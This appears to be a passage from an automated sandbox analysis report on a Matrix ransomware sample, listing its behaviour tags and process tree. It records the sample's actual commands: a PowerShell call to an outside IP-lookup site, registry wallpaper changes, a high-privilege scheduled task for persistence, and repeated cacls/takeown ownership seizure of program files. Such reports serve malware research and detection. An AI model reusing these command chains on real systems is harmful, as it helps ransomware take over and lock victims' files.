3868 wrote to memory of 1552 3868 cmd.exe 50 PID 3868 wrote to memory of 1552 3868 cmd.exe 50 PID 3868 wrote to memory of 1552 3868 cmd.exe 50 PID 3868 wrote to memory of 1552 3868 cmd.exe 50 PID 1552 wrote to memory of 3336 1552 6a9E8kW8.exe 51 PID 1552 wrote to memory of 3336 1552 6a9E8kW8.exe 51 PID 1552 wrote to memory of 3336 1552 6a9E8kW8.exe 51 PID 1552 wrote to memory of 3336 1552 6a9E8kW8.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW3O9cZ3.exe"2⤵PID:2952
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW3O9cZ3.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW3O9cZ3.exe" -n2⤵
- Executes dropped EXE
PID:2900
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\josWSiI6.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\pq59Xef7.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\pq59Xef7.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:2040
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:3036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yMIjbvh1.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yMIjbvh1.vbs"3⤵PID:2620
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dLETBaeG.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:3568
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dLETBaeG.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:3228
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:3000
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:3136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\6a9E8kW864.exe6a9E8kW8.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:2688 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:2996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:3972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:924 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:2104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:676 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:2108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
PID:2492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3188 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:3436 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:3432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Modifies file permissions
PID:2144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1452 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:3760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:1612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:2036 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:2088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:3936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:2532
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:3212 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵
- Modifies file permissions
PID:1524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵
- Loads dropped DLL
PID:3888 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "FreeCellMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:2272 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "FreeCellMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵
- Loads dropped DLL
PID:2576 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:3596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "HeartsMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:2052 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "HeartsMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵
- Loads dropped DLL
PID:2140 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:1720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ChessMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ChessMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:2260
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵
- Loads dropped DLL
PID:2788 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:3080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵
- Modifies file permissions
PID:2092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "LogTransport2.exe" -nobanner3⤵
- Loads dropped DLL
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "LogTransport2.exe" -nobanner4⤵
- Executes dropped EXE
PID:4080
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵
- Loads dropped DLL
PID:576 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:1708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "bl.gif" -nobanner3⤵
- Loads dropped DLL
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "bl.gif" -nobanner4⤵
- Executes dropped EXE
PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵
- Loads dropped DLL
PID:3184 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:3092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:3800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "forms_super.gif" -nobanner3⤵
- Loads dropped DLL
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "forms_super.gif" -nobanner4⤵
- Executes dropped EXE
PID:2280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵
- Loads dropped DLL
PID:2932 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:2876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "review_browser.gif" -nobanner3⤵
- Loads dropped DLL
PID:2364 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "review_browser.gif" -nobanner4⤵
- Executes dropped EXE
PID:3516
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵
- Loads dropped DLL
PID:4092 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:4064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tl.gif" -nobanner3⤵
- Loads dropped DLL
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tl.gif" -nobanner4⤵
- Executes dropped EXE
PID:3156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵
- Loads dropped DLL
PID:4056 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:3728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "Identity-V" -nobanner3⤵
- Loads dropped DLL
PID:3084 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:3980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵
- Loads dropped DLL
PID:2240 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:2224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵
- Modifies file permissions
PID:1056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵
- Loads dropped DLL
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵
- Executes dropped EXE
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵
- Loads dropped DLL
PID:2604 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:4024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SC_Reader.exe" -nobanner3⤵
- Loads dropped DLL
PID:2464 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SC_Reader.exe" -nobanner4⤵
- Executes dropped EXE
PID:2972
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵
- Loads dropped DLL
PID:2396 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:1864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "brt55.ths" -nobanner3⤵
- Loads dropped DLL
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "brt55.ths" -nobanner4⤵
- Executes dropped EXE
PID:3392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵
- Loads dropped DLL
PID:2628 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:2564
-
-
